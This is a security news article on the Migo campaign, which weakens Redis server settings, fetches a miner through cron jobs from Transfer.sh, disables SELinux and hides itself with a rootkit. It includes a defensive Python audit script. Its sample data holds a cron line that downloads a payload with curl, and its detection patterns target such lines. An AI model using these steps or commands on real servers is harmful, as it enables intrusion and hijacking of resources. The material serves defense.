Just one program turns servers into mining machines with the most sophisticated methods

Experts from Cado Security have identified a new malicious campaign targeting Redis servers. After gaining initial access to the systems, the attackers mine cryptocurrency on compromised hosts running Linux.

According to Matt Muir, one of the researchers, this campaign uses a number of fundamentally new methods to weaken server protection. In particular, configuration options such as protected-mode, replica-read-only, aof-rewrite-incremental-fsync, and rdb-save-incremental-fsync are disabled. This strategy allows hackers to send additional commands to the server from external networks, and also facilitates subsequent exploitation of vulnerabilities without attracting unnecessary attention.

After disabling the security mechanisms, attackers install two special keys in the system. The first key contains a link to download the Migo malware.

The second key starts a Cron task that periodically connects to the Transfer.sh service and downloads updated versions of Migo from there. This service allows anyone to share files anonymously and for free, and it was already used by attackers in similar attacks in early 2023.

This allows attackers to regularly upload new versions of malware or other tools to the compromised server at their own discretion.
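As an added defender-side illustration (not code from the Cado report or from Migo itself), the following Python audit parses `CONFIG GET` output for the four options named above and scans key values for the download-URL and crontab patterns the report describes. The config values, key names and the Transfer.sh URL are constructed placeholders, and the cron regex is a heuristic I chose, not an indicator from the report.

```python
import re

# Hardened values for the four options the campaign turns off (Redis ships all four as "yes").
EXPECTED = {
    "protected-mode": "yes",
    "replica-read-only": "yes",
    "aof-rewrite-incremental-fsync": "yes",
    "rdb-save-incremental-fsync": "yes",
}

def parse_config_get(lines):
    """Turn the flat name/value list that `redis-cli CONFIG GET '*'` prints into a dict."""
    items = [ln.strip() for ln in lines if ln.strip()]
    return dict(zip(items[0::2], items[1::2]))

def audit_config(cfg):
    """Return (option, observed, expected) for every option that deviates from EXPECTED."""
    return [(opt, cfg.get(opt, "<unset>"), want)
            for opt, want in EXPECTED.items() if cfg.get(opt) != want]

# Value patterns matching the two implanted keys the report describes: a Transfer.sh
# download URL and a crontab entry that refetches the payload on a schedule.
SUSPICIOUS_VALUE = [
    re.compile(r"https?://"),
    re.compile(r"transfer\.sh"),
    re.compile(r"^\s*[\d*/,\-]+(\s+[\d*/,\-]+){4}\s", re.M),  # five cron schedule fields
]

def suspicious_keys(kv):
    """Return the names of keys whose values look like a dropper URL or a crontab line."""
    return sorted(k for k, v in kv.items() if any(p.search(v) for p in SUSPICIOUS_VALUE))

# Constructed sample data standing in for a live server (not real campaign output).
SAMPLE_CONFIG_GET = """
protected-mode
no
replica-read-only
no
aof-rewrite-incremental-fsync
yes
rdb-save-incremental-fsync
no
"""
SAMPLE_KEYS = {
    "session:42": "user=alice",
    "backup1": "*/5 * * * * root curl -fsSL http://transfer.sh/PLACEHOLDER/m -o /tmp/m\n",
    "backup2": "http://transfer.sh/PLACEHOLDER/migo",
}
```

Run `audit_config(parse_config_get(SAMPLE_CONFIG_GET.splitlines()))` to list the three weakened options in the sample, and `suspicious_keys(SAMPLE_KEYS)` to flag the two implanted keys; on a real host, feed it the output of `redis-cli CONFIG GET '*'` and a dump of string keys instead.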

The Migo code implements various obfuscation methods that make it difficult to reverse engineer and analyze the program.

The main functionality of Migo is to download and launch the XMRig miner. In addition, the program performs a number of other important tasks: it establishes persistence so that it is launched on a schedule, blocks competing mining software, and initiates the mining process itself on the infected device.

The tool also disables the SELinux subsystem in Linux, which enforces mandatory access control policies. With SELinux disabled, Migo can operate without those restrictions.

Migo searches for and deletes scripts for uninstalling system monitoring software agents. Such agents are often deployed by cloud hosting providers to protect their infrastructure.

To mask running processes and traces in files, Migo uses a modified version of the popular Linux rootkit libprocesshider. Rootkits allow you to hide the presence of malware from standard detection tools.

As Muir notes, the Migo program's tactics largely overlap with the methods used by other well-known hacker groups, such as TeamTNT, WatchDog, and Rocke.

Cado Security analysts note that attackers are constantly creating and improving malicious tools to attack popular web platforms and services.

Cado Security recommends that administrators of Redis servers and other common web applications exercise increased vigilance in light of such cyber threats and monitor security updates.

• Source: https://www.cadosecurity.com/migo-a-redis-miner-with-novel-system-weakening-techniques/